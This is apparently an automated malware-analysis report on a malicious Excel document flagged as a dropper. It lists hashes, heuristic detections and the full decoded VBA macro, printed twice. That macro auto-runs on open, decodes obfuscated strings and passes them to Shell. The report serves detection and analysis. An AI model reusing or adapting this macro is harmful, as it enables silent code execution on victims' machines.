Office (OLE) malware analysis — malicious · 2ab28c438d647d8e

MALICIOUS

Office (OLE)

74.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2021-02-09

MD5: a8a8d792f404ecf97d0df751f6832bcf SHA-1: 499d16977ace09d8158285304259db920e72d1fa SHA-256: 2ab28c438d647d8e62e78f4307095874d62d28aeb073e5823aee2bbf38d038f2

256 Risk Score

Heuristics 7

ClamAV: Doc.Dropper.Agent-7011426-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7011426-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (rs0 + rs3 + rs1 + rs2)
```
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL

VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
Matched line in script
```
For aiWDAOpxi = 1 To Len(V4JVdoDM6)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3162 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3162 bytes
SHA-256: `f21bd4c8b70e8ac5cf74263d704cd0a3e7113138850fed3c7670bf18930fe13a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Open() rs0 = Replace(QzeBBKA8y(SMfVNQqv2("~„a…r1a", SMfVNQqv2("<", "4")), SMfVNQqv2("@", SMfVNQqv2("?", SMfVNQqv2("<", "4")))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("m", SMfVNQqv2(":", "6")), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6")))) rs2 = Replace(QzeBBKA8y(SMfVNQqv2("Wo~}~l[VPƒxp^OP", "6"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("Nsg", "2"), SMfVNQqv2(":", "6"))) rs1 = Replace(QzeBBKA8y(SMfVNQqv2("pw[q}{=", "9"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("T", "2"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("�y†;", "6"), SMfVNQqv2("?", SMfVNQqv2("<", "4")))) rs3 = Replace(QzeBBKA8y(SMfVNQqv2("\|\|xB77KKK6", SMfVNQqv2(";", "8")), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("M", "2"), SMfVNQqv2("<", "4")), QzeBBKA8y(SMfVNQqv2(" ", "5"), SMfVNQqv2(";", "8"))) Shell (rs0 + rs3 + rs1 + rs2) End Sub Public Function QzeBBKA8y(V4JVdoDM6 As String, pqcIpxLC9 As Integer) Dim aiWDAOpxi As Integer For aiWDAOpxi = 1 To Len(V4JVdoDM6) Mid(V4JVdoDM6, aiWDAOpxi, 1) = Chr(Asc(Mid(V4JVdoDM6, aiWDAOpxi, 1)) - pqcIpxLC9) Next aiWDAOpxi QzeBBKA8y = V4JVdoDM6 End Function Public Function SMfVNQqv2(zRc9PYTbD As String, LoEyylR6D As Integer) Dim FKtD6Y0KV As Integer For FKtD6Y0KV = 1 To Len(zRc9PYTbD) Mid(zRc9PYTbD, FKtD6Y0KV, 1) = Chr(Asc(Mid(zRc9PYTbD, FKtD6Y0KV, 1)) - LoEyylR6D) Next FKtD6Y0KV SMfVNQqv2 = zRc9PYTbD End Function Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: f21bd4c8b70e8ac5cf74263d704cd0a3e7113138850fed3c7670bf18930fe13a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Auto_Open()
rs0 = Replace(QzeBBKA8y(SMfVNQqv2("~„a…r1a", SMfVNQqv2("<", "4")), SMfVNQqv2("@", SMfVNQqv2("?", SMfVNQqv2("<", "4")))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("m", SMfVNQqv2(":", "6")), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))))
rs2 = Replace(QzeBBKA8y(SMfVNQqv2("Wo~}~l[VPƒxp^OP", "6"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("Nsg", "2"), SMfVNQqv2(":", "6")))
rs1 = Replace(QzeBBKA8y(SMfVNQqv2("pw[q}{=", "9"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("T", "2"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("�y†;", "6"), SMfVNQqv2("?", SMfVNQqv2("<", "4"))))
rs3 = Replace(QzeBBKA8y(SMfVNQqv2("||xB77KKK6", SMfVNQqv2(";", "8")), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("M", "2"), SMfVNQqv2("<", "4")), QzeBBKA8y(SMfVNQqv2(" ", "5"), SMfVNQqv2(";", "8")))
Shell (rs0 + rs3 + rs1 + rs2)
End Sub
Public Function QzeBBKA8y(V4JVdoDM6 As String, pqcIpxLC9 As Integer)
Dim aiWDAOpxi As Integer
For aiWDAOpxi = 1 To Len(V4JVdoDM6)
Mid(V4JVdoDM6, aiWDAOpxi, 1) = Chr(Asc(Mid(V4JVdoDM6, aiWDAOpxi, 1)) - pqcIpxLC9)
Next aiWDAOpxi
QzeBBKA8y = V4JVdoDM6
End Function
Public Function SMfVNQqv2(zRc9PYTbD As String, LoEyylR6D As Integer)
    Dim FKtD6Y0KV As Integer
    For FKtD6Y0KV = 1 To Len(zRc9PYTbD)
        Mid(zRc9PYTbD, FKtD6Y0KV, 1) = Chr(Asc(Mid(zRc9PYTbD, FKtD6Y0KV, 1)) - LoEyylR6D)
    Next FKtD6Y0KV
    SMfVNQqv2 = zRc9PYTbD
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.